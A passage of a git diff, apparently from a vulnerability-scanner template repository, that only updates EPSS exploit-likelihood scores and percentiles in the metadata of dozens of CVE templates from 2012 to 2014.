b/http/cves/2012/CVE-2012-1823.yaml index 03f626eedf..f4ca522e24 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-1823 cwe-id: CWE-20 epss-score: 0.97491 - epss-percentile: 0.99973 + epss-percentile: 0.99972 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index b3e0bda55b..29ad6c4175 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60895 + epss-percentile: 0.61052 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index a6268c69f2..0af000a34d 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-2371 cwe-id: CWE-79 epss-score: 0.00825 - epss-percentile: 0.79956 + epss-percentile: 0.80043 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index ede1122189..916277fc5e 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -23,8 +23,8 @@ info: cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo - epss-score: 0.96555 - epss-percentile: 0.99508 + epss-score: 0.95986 + epss-percentile: 0.99346 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 47ed6cfce5..857a5d3d03 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.00951 - epss-percentile: 0.81371 + epss-percentile: 0.81438 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 61b4fd7c1e..ea9f184e77 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59384 + epss-percentile: 0.59546 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 2a497a6055..341183836e 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4253 cwe-id: CWE-22 epss-score: 0.02018 - epss-percentile: 0.87635 + epss-percentile: 0.8767 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 284cd0a85b..e7ce96be3c 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62922 + epss-percentile: 0.6308 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 720cccde78..4cff8baf35 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.61015 + epss-percentile: 0.61174 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index b72890168b..85e1596aac 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - epss-percentile: 0.81087 + epss-percentile: 0.81161 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 469e05ae91..cd8e7b1007 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.00608 - epss-percentile: 0.76166 + epss-percentile: 0.76263 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 739c473901..04485c3dd9 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.90559 + epss-percentile: 0.90633 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 86f4edfdf3..1fd8d28971 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.14071 - epss-percentile: 0.95139 + epss-percentile: 0.95159 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index a1cf16545b..3d1b381dc9 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 - epss-score: 0.00763 - epss-percentile: 0.79073 + epss-score: 0.00553 + epss-percentile: 0.75093 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index e4cddf5f53..2f1c77d5cb 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 - epss-score: 0.02432 - epss-percentile: 0.88806 + epss-score: 0.01926 + epss-percentile: 0.87349 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 2b9e972953..f7ec0e6f5b 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01863 - epss-percentile: 0.87012 + epss-percentile: 0.87064 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index b999245b8f..01f72a6e3f 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - epss-percentile: 0.83592 + epss-percentile: 0.83698 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 0a0ffb53c8..6aea14788e 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - epss-percentile: 0.798 + epss-percentile: 0.79888 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 1727ea4635..d34e1e54bf 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-2248 cwe-id: CWE-20 epss-score: 0.97289 - epss-percentile: 0.99841 + epss-percentile: 0.99842 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 9e8277fe07..4ed81e57c8 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-2251 cwe-id: CWE-20 epss-score: 0.97432 - epss-percentile: 0.99932 + epss-percentile: 0.99936 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index ef4a8e06bc..b8fe9216bd 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59691 + epss-percentile: 0.59848 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index cd0a6e533f..7df74bca69 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03563 - epss-percentile: 0.90604 + epss-percentile: 0.90674 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index b755c01603..13b8d09fe4 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00519 - epss-percentile: 0.74112 + epss-percentile: 0.74241 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index d96d3518d3..fdeb7e2915 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.64598 - epss-percentile: 0.97567 + epss-percentile: 0.97594 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 53ebaa578c..0c302433b3 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83695 + epss-percentile: 0.83801 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index dc3fb151c8..cb18a72ed0 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83695 + epss-percentile: 0.83801 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index d60c8c4129..6f35fd23a7 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 - epss-score: 0.00565 - epss-percentile: 0.75222 + epss-score: 0.00534 + epss-percentile: 0.74648 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 707d599fc7..d40edb7fa6 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - epss-score: 0.06969 - epss-percentile: 0.93229 + epss-score: 0.06601 + epss-percentile: 0.93089 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 1a97f266f0..6ba8a62ed8 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.5866 + epss-percentile: 0.58813 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index f2bc6a6480..9e32b5ae59 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-7091 cwe-id: CWE-22 epss-score: 0.97337 - epss-percentile: 0.99864 + epss-percentile: 0.9987 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 56e3304741..9a614fd207 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - epss-score: 0.23987 - epss-percentile: 0.96138 + epss-score: 0.21533 + epss-percentile: 0.96002 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 808e595179..2ee3f05df0 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - epss-score: 0.52611 - epss-percentile: 0.97273 + epss-score: 0.55716 + epss-percentile: 0.97369 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 788156ebc0..71406daffd 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-10037 cwe-id: CWE-22 epss-score: 0.14101 - epss-percentile: 0.95142 + epss-percentile: 0.95161 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 3cf15beb09..913c9a7b0b 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.87739 + epss-percentile: 0.87764 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index ef02d73f39..d2f6efa0ff 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-2321 cwe-id: CWE-264 epss-score: 0.96364 - epss-percentile: 0.99433 + epss-percentile: 0.99452 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 1caa0c73a1..52bbb53822 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.96071 - epss-percentile: 0.9935 + epss-percentile: 0.99365 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 4cb056a41d..0c21d32a39 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - epss-percentile: 0.7846 + epss-percentile: 0.78566 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index b0bf85d474..2240edb4a3 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - epss-percentile: 0.759 + epss-percentile: 0.75999 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 4a8fd9bfc1..7db3fda324 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - epss-percentile: 0.99291 + epss-percentile: 0.99309 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 192fc321cd..8742cdedd6 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.53013 - epss-percentile: 0.97282 + epss-percentile: 0.97306 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 8aba1bbc10..10d6d458ab 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - epss-score: 0.54379 - epss-percentile: 0.97317 + epss-score: 0.31809 + epss-percentile: 0.96584 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 30ed9237db..2083c44bcf 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 - epss-score: 0.97531 - epss-percentile: 0.9999 + epss-score: 0.97537 + epss-percentile: 0.99994 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 56201c5447..648f944f74 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77509 + epss-percentile: 0.77635 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 240a63cf48..580968edfc 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - epss-percentile: 0.99662 + epss-percentile: 0.9967 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 1c1320c4c3..9ce452833c 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50179 + epss-percentile: 0.50288 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 07f581a9c9..0e85f8cfe3 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index ea96f726a5..112f76d089 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50764 + epss-percentile: 0.50857 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index bb26d88096..54c15c54f9 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 7e927c78d9..c9150b717f 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45488 + epss-percentile: 0.45595 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index facf173194..cc17372715 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 1f24b30292..042456c89e 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index bfb094135e..9d5876f6dd 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40264 + epss-percentile: 0.40317 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 8cc9104ae9..6b43931296 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 5cf2ff65ff..6b037da9d6 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.03891 - epss-percentile: 0.90998 + epss-percentile: 0.91064 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index a2a410c66a..1d39e1c854 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - epss-percentile: 0.82063 + epss-percentile: 0.82138 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 20a3c68cea..26f1b520b6 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.03716 - epss-percentile: 0.90793 + epss-percentile: 0.90865 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 392924b8c1..68b9b06ea2 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 